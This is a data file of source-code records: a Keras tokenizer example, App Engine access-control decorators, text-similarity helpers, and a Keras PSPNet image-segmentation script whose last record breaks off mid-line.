{"seq_id":"581126682","text":"from keras.preprocessing.text import Tokenizer\r\n# define 3 documents\r\ndocs = [\"Keras is an API designed for human beings, not machines.\",\r\n\t\t\"Easy to learn and easy to use.\" ,\r\n\t\t\"Keras makes it easy to turn models into products.\"]\r\n# create the Tokenizer\r\ntok = Tokenizer()\r\n# run the text-data preprocessing\r\ntok.fit_on_texts(docs)\r\n# print summary information\r\nprint(tok.document_count)\r\nprint(tok.word_counts)\r\nprint(tok.word_index)\r\nprint(tok.word_docs)","sub_path":"F9744/Keras/Ch13/Ch13_1_2.py","file_name":"Ch13_1_2.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"293044239","text":"\"\"\"\nA collection of decorators used for applying access\ncontrol to a handler method\n\"\"\"\n# third-party imports\nfrom google.appengine.api import users\n\n# local imports\nfrom nacelle.models.auth import AdminUser\nfrom nacelle.decorators.well_behaved import well_behaved\n\n\n@well_behaved\ndef login_required(func):\n\n \"\"\"\n Handler methods decorated with this function will\n be restricted to logged in users only\n \"\"\"\n\n def wrap(self, *args, **kwargs):\n\n # get current user object\n user = users.get_current_user()\n if user:\n # return method as normal if user logged in\n return func(self, *args, **kwargs)\n else:\n # redirect user to login page if not logged in\n self.redirect(users.create_login_url(self.request.uri))\n\n return wrap\n\n\n@well_behaved\ndef admin_required(func):\n\n \"\"\"\n Handler methods decorated with this function will\n be restricted to logged in admin users only\n \"\"\"\n\n def wrap(self, *args, **kwargs):\n\n # check if handler has been invoked by a task queue\n if 'X-AppEngine-TaskName' in self.request.headers:\n # allow access to handler\n return func(self, *args, **kwargs)\n\n # get current user object\n user = users.get_current_user()\n # get any configured AdminUser emails\n admin_emails = [u.email for u in AdminUser.all()]\n\n # check if user is logged in\n if user:\n # check if user is registered appengine admin\n if users.is_current_user_admin():\n return func(self, *args, **kwargs)\n # check if user is registered AdminUser\n elif user.email() in admin_emails:\n return func(self, *args, **kwargs)\n # otherwise abort with 403\n else:\n self.abort(403)\n else:\n # redirect user to login page\n self.redirect(users.create_login_url(self.request.uri))\n\n return wrap\n","sub_path":"nacelle/decorators/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
{"seq_id":"551258275","text":"import re\n\nimport nltk\nimport unidecode\n\nfrom util.metric import compute_jaccard_index\n\n\ndef compute_sentence_similarity(sentence1: str, sentence2: str) -> float:\n \"\"\"Compute the similarity using the Jaccard index on the BOW model of both sentences.\n\n Parameters\n ----------\n sentence1 : str\n The first sentence.\n sentence2 : str\n The second sentence.\n\n Returns\n -------\n The Jaccard index computed on the BOW of both sentences.\n \"\"\"\n bow1 = get_bow(sentence1)\n bow2 = get_bow(sentence2)\n return compute_jaccard_index(bow1, bow2)\n\n\ndef get_bow(sentence: str) -> set:\n \"\"\"Compute the Bag-of-Words (BOW) set of a sentence.\n\n 
Parameters\n ----------\n sentence : str\n Sentence to compute the Bag-of-Words representation for.\n\n Returns\n -------\n The set of unique cleaned words (cleaned by the clean_word method) found in the sentence with non-zero length.\n \"\"\"\n words = nltk.word_tokenize(sentence)\n return {clean_word(word) for word in words if len(clean_word(word)) > 0}\n\n\ndef clean_word(word: str) -> str:\n \"\"\"Clean a word: remove any non-alphabetic character of the lower-cased version of the word and remove any accents.\n\n Parameters\n ----------\n word : str\n Word to clean.\n\n Returns\n -------\n str\n Cleaned word.\n \"\"\"\n return re.sub(r'[^a-z]+', '', unidecode.unidecode(word).lower())\n\n\ndef word_to_hash(word: str, vocab_size: int) -> int:\n \"\"\"Compute a hash for a word.\n\n Parameters\n ----------\n word : str\n Word to compute the hash for.\n\n vocab_size : int\n The maximum number of words in the vocab.\n\n Returns\n -------\n int\n The hash such that 0 <= hash < vocab_size.\n \"\"\"\n cleaned_word = clean_word(word)\n hash_sum = 0\n for i, char in enumerate(list(cleaned_word)):\n # A large prime number is used for better pseudo-randomness approximation\n hash_sum += (i * ord(char) * 104729) % vocab_size\n hash_sum = hash_sum % vocab_size\n return hash_sum\n\n\ndef levenshtein(seq1, seq2):\n \"\"\"Compute the edit distance between two words seq1 and seq2.\n\n Parameters\n ----------\n seq1 : str\n The first word.\n seq2 : str\n The second word.\n\n Returns\n -------\n int\n The edit distance.\n \"\"\"\n if len(seq1) < len(seq2):\n return levenshtein(seq2, seq1)\n\n previous_row = range(len(seq2) + 1)\n for i, c1 in enumerate(seq1):\n current_row = [i + 1]\n for j, c2 in enumerate(seq2):\n insertions = previous_row[\n j + 1] + 1\n deletions = current_row[j] + 1\n substitutions = previous_row[j] + (c1 != c2)\n current_row.append(min(insertions, deletions, substitutions))\n previous_row = current_row\n\n return previous_row[-1]\n\n\ndef compute_levenshtein_score(w1, w2):\n \"\"\"Compute a score based on the edit distance for two words w1 and w2.\n\n Parameters\n ----------\n w1 : str\n The first word.\n w2 : str\n The second word.\n\n Returns\n -------\n float\n 0.0 if either w1 is empty or w2 is empty.\n 1.0 - levenshtein(w1, w2) / max_possible such that identical words have score 1.0 and completely dissimilar\n words have score 0.0.\n \"\"\"\n if min(len(w1), len(w2)) == 0:\n return 0.\n max_levenshtein = max(len(w1), len(w2))\n return 1. - levenshtein(unidecode.unidecode(w1.lower()), unidecode.unidecode(w2.lower())) / float(max_levenshtein)\n","sub_path":"util/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"255733190","text":"#! 
/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n########################################################################\n## \n## A Keras implementation of PSPNet (WIP)\n## \n## References:\n## - https://arxiv.org/pdf/1612.01105.pdf\n## - image-segmentation-keras\n## - https://github.com/yutaroyamanaka/semantic-segmentation/blob/master/pspnet/model.py\n## https://tarovel4842.hatenablog.com/entry/2019/11/15/180322\n## \n## Data augmentation with imgaug\n## https://imgaug.readthedocs.io/en/latest/source/examples_segmentation_maps.html\n## \n########################################################################\n\nimport os\nimport sys\nimport random\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\" # index of the GPU to use\n\nimport numpy as np\nimport keras\nfrom keras.models import *\nfrom keras.layers import *\nfrom keras.callbacks import *\nimport keras.backend as K\n\nfrom tqdm import tqdm\n\nimport cv2\nimport itertools\nimport imgaug as ia\nimport imgaug.augmenters as iaa\nfrom imgaug.augmentables.segmaps import SegmentationMapsOnImage\nia.seed(1)\n\n\nclass PSPNetFactory:\n \n def __init__(self):\n pass\n\n def conv_block(self, input_tensor, kernel_size, filters, stage, block, strides=(2, 2)):\n\n filters1, filters2, filters3 = filters\n\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = Conv2D(filters=filters1, kernel_size=(1, 1), strides=strides, name=conv_name_base + '2a')(input_tensor)\n x = BatchNormalization(axis=3, name=bn_name_base + '2a')(x)\n x = Activation(activation='relu')(x)\n\n x = Conv2D(filters=filters2, kernel_size=kernel_size, padding='same', name=conv_name_base + '2b')(x)\n x = BatchNormalization(axis=3, name=bn_name_base + '2b')(x)\n x = Activation(activation='relu')(x)\n\n x = Conv2D(filters=filters3, kernel_size=(1, 1), name=conv_name_base + '2c')(x)\n x = BatchNormalization(axis=3, name=bn_name_base + '2c')(x)\n\n shortcut = Conv2D(filters=filters3, kernel_size=(1, 1), strides=strides, name=conv_name_base + '1')(input_tensor)\n shortcut = BatchNormalization(axis=3, name=bn_name_base + '1')(shortcut)\n\n x = add(inputs=[x, shortcut])\n x = Activation(activation='relu')(x)\n return x\n\n def identity_block(self, input_tensor, kernel_size, filters, stage, block):\n\n filters1, filters2, filters3 = filters\n\n conv_name_base = 'res' + str(stage) + block + '_branch'\n bn_name_base = 'bn' + str(stage) + block + '_branch'\n\n x = Conv2D(filters=filters1, kernel_size=(1, 1), name=conv_name_base + '2a')(input_tensor)\n x = BatchNormalization(axis=3, name=bn_name_base + '2a')(x)\n x = Activation(activation='relu')(x)\n\n x = Conv2D(filters=filters2, kernel_size=kernel_size, padding='same', name=conv_name_base + '2b')(x)\n x = BatchNormalization(axis=3, name=bn_name_base + '2b')(x)\n x = Activation(activation='relu')(x)\n\n x = Conv2D(filters=filters3, kernel_size=(1, 1), name=conv_name_base + '2c')(x)\n x = BatchNormalization(axis=3, name=bn_name_base + '2c')(x)\n\n x = add(inputs=[x, input_tensor])\n x = Activation(activation='relu')(x)\n return x\n\n def pool_block(self, feats, pool_factor):\n\n h = K.int_shape(feats)[1]\n w = K.int_shape(feats)[2]\n\n pool_size = strides = [\n int(np.round(float(h) / pool_factor)),\n int(np.round(float(w) / pool_factor))]\n\n x = AveragePooling2D(pool_size=pool_size, strides=strides, padding='same')(feats)\n x = Conv2D(filters=512, kernel_size=(1, 1), padding='same', use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Activation(activation='relu')(x)\n\n x = self.resize_image(input=x, factors=strides)\n return 
x\n\n def resize_image(self, input, factors):\n return Lambda(lambda x: K.resize_images(x=x,\n height_factor=factors[0],\n width_factor=factors[1],\n data_format='channels_last',\n interpolation='bilinear'))(input)\n\n def pyramid_pooling_module(self, input, pool_factors=[1, 2, 3, 6]):\n pool_outs = [input]\n\n for p in pool_factors:\n pooled = self.pool_block(input, p)\n pool_outs.append(pooled)\n\n o = Concatenate(axis = -1)(pool_outs)\n return o\n\n def create(self, input_height, input_width, n_classes, with_auxiliary_loss=True):\n\n assert input_height % 32 == 0\n assert input_width % 32 == 0\n\n input_shape = (input_height, input_width, 3)\n\n input = Input(shape = input_shape)\n \n # build basic ResNet50 structure\n\n x = ZeroPadding2D(padding=(3, 3))(input)\n x = Conv2D(filters=64, kernel_size=(7, 7), strides=(2, 2), name='conv1')(x) # 1/2\n # f1 = x\n\n x = BatchNormalization(axis=3, name='bn_conv1')(x)\n x = Activation(activation='relu')(x)\n x = MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(x) # 1/4\n\n x = self.conv_block(x, kernel_size=3, filters=[64, 64, 256], stage=2, block='a', strides=(1, 1))\n x = self.identity_block(x, kernel_size=3, filters=[64, 64, 256], stage=2, block='b')\n x = self.identity_block(x, kernel_size=3, filters=[64, 64, 256], stage=2, block='c')\n # f2 = one_side_pad(x)\n\n x = self.conv_block(x, kernel_size=3, filters=[128, 128, 512], stage=3, block='a') # 1/8\n x = self.identity_block(x, kernel_size=3, filters=[128, 128, 512], stage=3, block='b')\n x = self.identity_block(x, kernel_size=3, filters=[128, 128, 512], stage=3, block='c')\n x = self.identity_block(x, kernel_size=3, filters=[128, 128, 512], stage=3, block='d')\n # f3 = x\n\n x = self.conv_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='a') # 1/16\n x = self.identity_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='b')\n x = self.identity_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='c')\n x = self.identity_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='d')\n x = self.identity_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='e')\n x = self.identity_block(x, kernel_size=3, filters=[256, 256, 1024], stage=4, block='f')\n f4 = x\n\n x = self.conv_block(x, kernel_size=3, filters=[512, 512, 2048], stage=5, block='a') # 1/32\n x = self.identity_block(x, kernel_size=3, filters=[512, 512, 2048], stage=5, block='b')\n x = self.identity_block(x, kernel_size=3, filters=[512, 512, 2048], stage=5, block='c')\n f5 = x\n\n # Pyramid Pooling Module\n x = self.pyramid_pooling_module(input=f5, pool_factors=[1, 2, 3, 6])\n\n # main branch : Prediction Layers\n x = Conv2D(filters=512, kernel_size=(1, 1), use_bias=False)(x)\n x = BatchNormalization()(x)\n x = Activation(activation='relu')(x)\n x = Conv2D(filters=n_classes, kernel_size=(3, 3), padding='same')(x)\n x = self.resize_image(input=x, factors=(32, 32)) # 1/1\n\n if with_auxiliary_loss:\n # sub branch for auxiliary loss feedback\n aux = f4\n # aux = self.pyramid_pooling_module(input=aux, pool_factors=[1, 2, 3, 6])\n # I wondered whether a Pyramid Pooling Module is needed here as well, but this implementation does not include one:\n # https://github.com/hszhao/semseg/blob/master/model/pspnet.py\n aux = Conv2D(filters=256, kernel_size=(1, 1), use_bias=False)(aux)\n aux = BatchNormalization()(aux)\n aux = Activation(activation='relu')(aux)\n aux = Conv2D(filters=n_classes, kernel_size=(3, 3), padding='same')(aux)\n aux = self.resize_image(input=aux, factors=(16, 16)) # 1/1\n else:\n aux = None\n\n return 
self.get_segmentation_model(input=input, output=x, aux_output=aux)\n\n\n def get_segmentation_model(self, input, output, aux_output=None):\n\n o = output\n\n o_shape = Model(input, o).output_shape\n i_shape = Model(input, o).input_shape\n\n output_height = o_shape[1]\n output_width = o_shape[2]\n input_height = i_shape[1]\n input_width = i_shape[2]\n n_classes = o_shape[3]\n\n print(\"Input : {} x {}\".format(input_height, input_width))\n print(\"Output : {} x {}\".format(output_height, output_width))\n\n o = Reshape(target_shape=(output_height*output_width, -1))(o)\n o = Activation(activation='softmax')(o)\n\n if aux_output != None:\n aux_o_shape = Model(input, aux_output).output_shape\n assert output_height == aux_o_shape[1]\n assert output_width == aux_o_shape[2]\n\n o_aux = Reshape(target_shape=(output_height*output_width, -1))(aux_output)\n o_aux = Activation(activation='softmax')(o_aux)\n model_output =[o, o_aux]\n else:\n model_output =[o]\n\n # for training\n model = Model(input, model_output)\n model.output_width = output_width\n model.output_height = output_height\n model.n_classes = n_classes\n model.input_height = input_height\n model.input_width = input_width\n model.model_name = \"pspnet\"\n\n return model\n\nclass Segmentation:\n\n def __init__(self, model):\n self.model = model\n\n def get_pairs_from_paths(self, images_path, segs_path):\n\n ACCEPTABLE_IMAGE_FORMATS = [\".jpg\", \".png\"]\n ACCEPTABLE_SEGMENTATION_FORMATS = [\".png\"]\n\n image_files = []\n segmentation_files = {}\n\n for dir_entry in os.listdir(images_path):\n if os.path.isfile(os.path.join(images_path, dir_entry)) and \\\n os.path.splitext(dir_entry)[1] in ACCEPTABLE_IMAGE_FORMATS:\n file_name, file_extension = os.path.splitext(dir_entry)\n image_files.append((file_name, file_extension,\n os.path.join(images_path, dir_entry)))\n\n for dir_entry in os.listdir(segs_path):\n if os.path.isfile(os.path.join(segs_path, dir_entry)) and \\\n os.path.splitext(dir_entry)[1] in ACCEPTABLE_SEGMENTATION_FORMATS:\n file_name, file_extension = os.path.splitext(dir_entry)\n full_dir_entry = os.path.join(segs_path, dir_entry)\n segmentation_files[file_name] = (file_extension, full_dir_entry)\n\n return_value = []\n for image_file, _, image_full_path in image_files:\n if image_file in segmentation_files:\n return_value.append((image_full_path,\n segmentation_files[image_file][1]))\n\n return return_value\n\n\n def image_segmentation_generator(self, images_path, segs_path, batch_size,\n n_classes, input_height, input_width,\n output_height, output_width, \n augument_image=True, \n with_auxiliary_loss=True):\n\n img_seg_pairs = self.get_pairs_from_paths(images_path, segs_path)\n random.shuffle(img_seg_pairs)\n zipped = itertools.cycle(img_seg_pairs)\n\n # https://imgaug.readthedocs.io/en/latest/source/api_augmenters_meta.html#imgaug.augmenters.meta.Sequential\n seq = iaa.Sequential([\n # https://imgaug.readthedocs.io/en/latest/source/overview/flip.html\n iaa.Fliplr(0.5), # horizontal flip with 50% probability\n iaa.Flipud(0.5), # vertical flip with 50% probability\n # https://imgaug.readthedocs.io/en/latest/source/overview/size.html#cropandpad\n iaa.Sometimes(0.5, iaa.CropAndPad(\n percent=(-0.1, 0.1), # randomly crop up to 10% or pad up to 10% on each side\n pad_mode='constant', # pad with a constant value\n pad_cval=0 # the padding value is 0 (black)\n # without keep_size=False the result is resized back to the original size\n )),\n # https://imgaug.readthedocs.io/en/latest/source/overview/geometric.html#affine\n # https://imgaug.readthedocs.io/en/latest/source/api_augmenters_geometric.html#imgaug.augmenters.geometric.Affine\n            
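# Random affine transform, applied to the image and its mask together (50% of samples):\n            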
iaa.Sometimes(0.5, iaa.Affine(\n scale={\"x\": (0.8, 1.2), \"y\": (0.8, 1.2)}, # rescale each axis to 80% - 120%\n translate_percent={\"x\": (-0.2, 0.2), \"y\": (-0.2, 0.2)}, # translate each axis by -20% to +20%\n rotate=(-45, 45), # rotation angle between -45 and +45 degrees\n shear=(-16, 16), # shear angle between -16 and +16 degrees\n order=[0, 1], # interpolation is nearest-neighbor or bi-linear (picked at random)\n cval=0, # the background value is 0 (black)\n mode='constant' # fill the background with a constant value\n )),\n ], random_order=True) # apply the augmenters in random order\n\n while True:\n X = []\n Y = []\n for _ in range(batch_size):\n im, seg = next(zipped)\n\n im = cv2.imread(im, 1)\n seg = cv2.imread(seg, 1)\n\n if augument_image:\n # data augmentation\n aug_det = seq.to_deterministic()\n image_aug = aug_det.augment_image(im)\n segmap = ia.SegmentationMapsOnImage(seg, shape=im.shape)\n segmap_aug = aug_det.augment_segmentation_maps(segmap)\n segmap_aug = segmap_aug.get_arr()\n \n im = image_aug\n seg = segmap_aug\n\n X.append(self.get_image_array(im, input_width, input_height))\n Y.append(self.get_segmentation_array(seg, n_classes, output_width, output_height))\n\n if with_auxiliary_loss:\n yield np.array(X), [np.array(Y), np.array(Y)]\n else:\n yield np.array(X), [np.array(Y)]\n\n\n def get_image_array(self, image_input, width, height):\n\n if type(image_input) is np.ndarray:\n img = image_input\n else:\n img = cv2.imread(image_input, 1)\n\n img = cv2.resize(img, (width, height))\n img = img.astype(np.float32)\n img = img/255.0\n\n return img\n\n\n def get_segmentation_array(self, image_input, nClasses, width, height, no_reshape=False):\n \"\"\" Load segmentation array from input \"\"\"\n\n seg_labels = np.zeros((height, width, nClasses))\n\n if type(image_input) is np.ndarray:\n img = image_input\n else:\n img = cv2.imread(image_input, 1)\n\n img = cv2.resize(img, (width, height), interpolation=cv2.INTER_NEAREST)\n img = img[:, :, 0]\n\n for c in range(nClasses):\n seg_labels[:, :, c] = (img == c).astype(int)\n\n if not no_reshape:\n seg_labels = np.reshape(seg_labels, (width*height, nClasses))\n\n return seg_labels\n\n def predict(self, image_input):\n model = self.model\n\n output_width = model.output_width\n output_height = model.output_height\n input_width = model.input_width\n input_height = model.input_height\n n_classes = model.n_classes\n\n x = self.get_image_array(image_input=image_input, width=input_width, height=input_height)\n x = np.array([x])\n o = model.predict(x, batch_size=None, verbose=0, steps=None)\n \n if len(o) == 2:\n o = o[0]\n\n # print(o.shape) # -> (1, 331776, 7)\n result = o[0]\n # print(result.shape) # -> (331776, 7)\n\n pr = result.reshape((output_height, output_width, n_classes))\n # print(pr.shape) # -> (576, 576, 7)\n\n return pr\n\n\n def evaluate(self, test_images, test_annotations, bootstrap_repeats=None, print_each=False):\n model = self.model\n\n def mean_confidence_interval(a, confidence=0.95):\n n = len(a)\n m, se = np.mean(a), scipy.stats.sem(a)\n h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1)\n return m, m-h, m+h\n \n paths = self.get_pairs_from_paths(test_images, test_annotations)\n paths = list(zip(*paths))\n inp_images = list(paths[0])\n annotations = list(paths[1])\n\n if print_each:\n print('== I, U, gt for each image and each class ==')\n print(\"data-id\", end='')\n for i in range(model.n_classes) :\n print(\"\\t{}_i\\t{}_u\\t{}_gt\".format(i,i,i), end='')\n print()\n\n z = []\n for inp, ann, path in zip(inp_images, annotations, paths[0]):\n # prediction result\n pr = self.predict(inp)\n pr = pr.argmax(axis=2)\n pr = pr.flatten()\n\n # ground truth\n gt = self.get_segmentation_array(image_input=ann, \n                                 
nClasses=model.n_classes,\n width=model.output_width,\n height=model.output_height,\n no_reshape=True)\n gt = gt.argmax(-1)\n gt = gt.flatten()\n\n # area computation per class (the computationally heavy part)\n tp = np.zeros(model.n_classes) # true positive\n fp = np.zeros(model.n_classes) # false positive\n fn = np.zeros(model.n_classes) # false negative\n n_pixels = np.zeros(model.n_classes)\n for cl_i in range(model.n_classes):\n tp[cl_i] += np.sum((pr == cl_i) * (gt == cl_i))\n fp[cl_i] += np.sum((pr == cl_i) * ((gt != cl_i)))\n fn[cl_i] += np.sum((pr != cl_i) * ((gt == cl_i)))\n n_pixels[cl_i] += np.sum(gt == cl_i)\n z.append((tp, fp, fn, n_pixels))\n\n if print_each:\n print(os.path.basename(path), end='')\n _union = tp + fp + fn\n for i in range(model.n_classes) :\n print(\"\\t{:.0f}\\t{:.0f}\\t{:.0f}\".format(tp[i], _union[i], n_pixels[i]), end='')\n print()\n print()\n\n tp = np.zeros(model.n_classes) # true positive\n fp = np.zeros(model.n_classes) # false positive\n fn = np.zeros(model.n_classes) # false negative\n n_pixels = np.zeros(model.n_classes)\n for _tp, _fp, _fn, _n_pixels in z:\n for i in range(model.n_classes):\n tp[i] += _tp[i]\n fp[i] += _fp[i]\n fn[i] += _fn[i]\n n_pixels[i] += _n_pixels[i]\n \n precision = tp / (tp + fp)\n recall = tp / (tp + fn)\n\n print('== IoU ==')\n cl_wise_score = tp / (tp + fp + fn + 0.000000000001) # intersection over union\n n_pixels_norm = n_pixels / np.sum(n_pixels)\n frequency_weighted_IU = np.sum(cl_wise_score*n_pixels_norm)\n mean_IU = np.mean(cl_wise_score)\n \n for i in range(model.n_classes) :\n print(\"class_{}:\\t{:.4f}\".format(i, cl_wise_score[i]))\n print(\"mean:\\t{:.4f}\".format(mean_IU))\n print(\"frequency_weighted:\\t{:.4f}\".format(frequency_weighted_IU))\n print()\n\n if bootstrap_repeats != None:\n print('== Bootstrap mean of IoU and 95% percentile interval ==')\n _mean = []\n _freq = []\n _clsw = [[] for i in range(model.n_classes)] \n for i in tqdm(np.arange(bootstrap_repeats)):\n \n tp = np.zeros(model.n_classes)\n fp = np.zeros(model.n_classes)\n fn = np.zeros(model.n_classes)\n n_pixels = np.zeros(model.n_classes)\n for idx in np.random.choice(len(z), len(z), replace=True):\n _tp, _fp, _fn, _n_pixels = z[idx]\n tp += _tp\n fp += _fp\n fn += _fn\n n_pixels += _n_pixels\n\n cl_wise_score = tp / (tp + fp + fn + 0.000000000001) # intersection over union\n n_pixels_norm = n_pixels / np.sum(n_pixels)\n frequency_weighted_IU = np.sum(cl_wise_score*n_pixels_norm)\n mean_IU = np.mean(cl_wise_score)\n\n _mean.append(mean_IU)\n _freq.append(frequency_weighted_IU)\n for i in range(model.n_classes) :\n _clsw[i].append(cl_wise_score[i])\n\n for i in range(model.n_classes) :\n _m, _l, _h = mean_confidence_interval(np.array(_clsw[i]))\n print(\"class_{}:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(i, _m, _l, _h))\n _m, _l, _h = mean_confidence_interval(np.array(_mean))\n print(\"mean:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(_m, _l, _h))\n _m, _l, _h = mean_confidence_interval(np.array(_freq))\n print(\"frequency_weighted:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(_m, _l, _h))\n print()\n\n print('== Precision, Recall, F-score ==')\n f_score = 2 / ((1/precision) + (1/recall))\n print(\"cls#\\tPrecision\\tRecall\\tF-score\")\n for i in range(model.n_classes):\n print(\"class_{}:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(\n i,\n precision[i],\n recall[i],\n f_score[i]))\n print(\"mean:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(\n np.mean(precision),\n np.mean(recall),\n np.mean(f_score),\n ))\n print(\"frequency_weighted:\\t{:.4f}\\t{:.4f}\\t{:.4f}\".format(\n np.sum(precision * n_pixels_norm),\n np.sum(recall * 
n_pixels_norm),\n np.sum(f_score * n_pixels_norm),\n ))\n return\n\n\n def train(self,\n input_height,\n input_width,\n n_classes,\n train_images,\n train_annotations,\n val_images,\n val_annotations,\n checkpoints_path,\n epochs=5,\n batch_size=2,\n val_batch_size=2, \n steps_per_epoch=512,\n val_steps_per_epoch=512,\n optimizer_name='adadelta',\n aux_loss_weight = 0.4):\n\n model = self.model\n\n output_height = model.output_height\n output_width = model.output_width\n\n if aux_loss_weight == None:\n with_auxiliary_loss = False\n model.compile(\n loss=['categorical_crossentropy'],\n optimizer=optimizer_name, \n metrics=[\n 'accuracy', \n # keras.metrics.MeanIoU(num_classes=n_classes), # requires TF 2.0.0 or later\n ])\n else:\n assert aux_loss_weight < 1.0\n assert aux_loss_weight >= 0.0\n with_auxiliary_loss = True\n model.compile(\n loss=['categorical_crossentropy', 'categorical_crossentropy'], \n loss_weights=[1.0 - aux_loss_weight, aux_loss_weight],\n optimizer=optimizer_name, \n metrics=['accuracy', keras.metrics.MeanIoU(num_classes=n_classes)])\n\n train_gen = self.image_segmentation_generator(\n train_images, train_annotations, batch_size, n_classes,\n input_height, input_width, output_height, output_width, \n augument_image=True,\n with_auxiliary_loss=with_auxiliary_loss)\n\n val_gen = self.image_segmentation_generator(\n val_images, val_annotations, val_batch_size, n_classes, \n input_height, input_width, output_height, output_width, \n augument_image=False,\n with_auxiliary_loss=with_auxiliary_loss)\n\n callbacks = [\n ModelCheckpoint(filepath=checkpoints_path+'/model.{epoch:02d}-{val_loss:.2f}.hdf5')\n ]\n\n os.makedirs(checkpoints_path, exist_ok=True)\n\n model.fit_generator(generator=train_gen,\n steps_per_epoch=steps_per_epoch,\n validation_data=val_gen,\n validation_steps=val_steps_per_epoch,\n epochs=epochs, \n callbacks=callbacks,\n use_multiprocessing=False)\n\nimport numpy as np\nimport scipy.stats\n\n\n\n\nhelp = \"\"\"\nUsage: pspnet-4class.py train\nUsage: pspnet-4class.py predict weights_file output_suffix\nUsage: pspnet-4class.py evaluate weights_file bootstrap_repeats\n\"\"\"\n\n\nif __name__ == \"__main__\":\n\n args = sys.argv\n if len(args) < 2 : exit(help)\n\n input_height = 576\n input_width = 576\n n_classes = 5 # 4 + background\n dataset_base_dir = \"./dataset\"\n\n epoches = 200\n batch_size = 10\n steps_per_epoch = 1000\n val_batch_size = 2\n val_steps_per_epoch = 112 / val_batch_size # number of test images = 112\n\n checkpoints_path = 'checkpoints'\n with_auxiliary_loss = False\n aux_loss_weight = None #0.4\n\n model = PSPNetFactory().create(\n input_height=input_height, \n input_width=input_width, \n n_classes=n_classes, \n with_auxiliary_loss=with_auxiliary_loss)\n \n model.summary()\n\n command = args[1]\n if command == 'train' :\n\n if len(args) > 2:\n weights_file = args[2]\n model.load_weights(weights_file)\n\n segmentation = Segmentation(model)\n segmentation.train(\n input_height = input_height, \n input_width = input_width, \n n_classes = n_classes,\n train_images = dataset_base_dir + \"/train_images/\",\n train_annotations = dataset_base_dir + \"/train_annotations/\",\n val_images = dataset_base_dir + \"/val_images/\",\n val_annotations = dataset_base_dir + \"/val_annotations/\",\n checkpoints_path = checkpoints_path,\n epochs = epoches,\n batch_size = batch_size,\n val_batch_size = val_batch_size,\n steps_per_epoch = steps_per_epoch,\n val_steps_per_epoch = val_steps_per_epoch,\n aux_loss_weight = aux_loss_weight)\n\n elif command == 
'evaluate' :\n\n if len(args) < 3 : exit(help)\n \n weights_file = args[2]\n\n if len(args) > 3:\n bootstrap_repeats = int(args[3])\n else:\n bootstrap_repeats = None\n \n model.load_weights(weights_file)\n segmentation = Segmentation(model)\n print()\n print(\"for the test dataset\")\n segmentation.evaluate(\n test_images = dataset_base_dir + '/test_images/', \n test_annotations = dataset_base_dir + '/test_annotations/',\n bootstrap_repeats = bootstrap_repeats)\n print()\n print(\"for the validation dataset\")\n segmentation.evaluate(\n test_images = dataset_base_dir + '/val_images/', \n test_annotations = dataset_base_dir + '/val_annotations/',\n bootstrap_repeats = bootstrap_repeats)\n print()\n print(\"for the training dataset\")\n segmentation.evaluate(\n test_images = dataset_base_dir + '/train_images/', \n test_annotations = dataset_base_dir + '/train_annotations/',\n bootstrap_repeats = bootstrap_repeats)\n \n elif command == 'predict' :\n\n if len(args) < 4 : exit(help)\n\n weights_file = args[2]\n output_suffix = args[3]\n\n model.load_weights(weights_file)\n segmentation = Segmentation(model)\n\n labels = {\n 0: \"Background\",\n 1: \"Fibrocalcific plaque\",\n 2: \"Fibrous cap atheroma / TCFA\",\n 3: \"Healed erosion/rupture\",\n 4: \"Intimal xanthoma / Pathological intimal thickening\",\n }\n colors = {\n 0: (0, 000, 000), # black\n 1: (1, 000, 255), # red\n 2: (2, 127, 255), # orange\n 3: (3, 255, 255), # yellow\n 4: (5, 255, 000), # green\n }\n\n os.makedirs(os.path.join(dataset_base_dir, 'test_predict'), exist_ok=True)\n\n for name in os.listdir(os.path.join(dataset_base_dir, 'test_images')):\n image_input_path = os.path.join(dataset_base_dir, 'test_images', name)\n\n if os.path.isfile(image_input_path) != True:\n continue\n if os.path.splitext(name)[1] != '.png':\n continue\n\n print(image_input_path)\n\n pr = segmentation.predict(image_input=image_input_path)\n # print(pr.shape) # -> (576, 576, 5)\n pr_height = pr.shape[0]\n pr_width = pr.shape[1]\n\n for i in range(n_classes):\n # v = pr[:,:,i]\n # print(\"{} : {:.6f} ({})\".format(i, np.max(v), labels[i]))\n img = np.zeros((pr_height, pr_width, 3))\n b, g, r = colors[i]\n img[:,:,0] = pr[:,:,i] * b\n img[:,:,1] = pr[:,:,i] * g\n img[:,:,2] = pr[:,:,i] * r\n filename = os.path.join(dataset_base_dir, 'test_predict', name) + \".{}_{}.png\".format(output_suffix, i)\n cv2.imwrite(filename, img)\n print(\"wrote : {}\".format(filename))\n\n pr = pr.argmax(axis=2)\n # print(pr.shape) # -> (576, 576)\n\n img = np.zeros((pr_height, pr_width, 3))\n\n for i in range(n_classes):\n v = 100 * np.count_nonzero(pr == i) / (pr_height * pr_width)\n print(\"{} : {}%\".format(i, v))\n\n b, g, r = colors[i]\n\n rCh = (pr == i) * r\n gCh = (pr == i) * g\n bCh = (pr == i) * b\n\n img[:, :, 2] += rCh[:, :]\n img[:, :, 1] += gCh[:, :]\n img[:, :, 0] += bCh[:, :]\n\n filename = os.path.join(dataset_base_dir, 